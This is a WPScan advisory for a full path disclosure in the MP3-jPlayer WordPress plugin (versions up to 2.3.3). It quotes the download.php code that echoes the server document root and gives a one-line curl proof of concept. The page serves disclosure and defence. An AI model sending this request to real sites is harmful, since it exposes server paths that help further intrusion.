MP3-jPlayer <= 2.3.3 - Full Path Disclosure



Description
The download.php code allows arbitrary users to disclose path information on WordPress sites with this plugin installed. 

120                 $info = "<p>
121                         Get: " . $mp3 . "<br />
122                         Sent: " . $sent . "<br />
123                         File: " . $file . "<br />
124                         Open: " . $_SERVER['DOCUMENT_ROOT'] . $fp . "<br />
125                         Root: " . $rooturl . "<br />
126                         pID: " . $playerID . "<br />
127                         Dbug: " . $dbug . "<br />
128                         extension: " . $fileExtension . "</p>";
129                 echo $info;
Proof of Concept
$ curl http://www.example.com/wp-content/plugins/mp3-jplayer/download.php?mp3=.

Affects Plugin

References

URL http://www.vapid.dhs.org/advisory.php?v=149

Classification

Type FPD
OWASP Top 10 A6: Sensitive Data Exposure
CWE CWE-200

Miscellaneous

Submitter Larry W. Cashdollar
Submitter Twitter _larry0
Views 928
Verified No
WPVDB ID 8144

Timeline

Publicly Published 2015-08-06 (over 3 years ago)
Added 2015-08-10 (over 3 years ago)
Last Updated 2015-08-10 (over 3 years ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.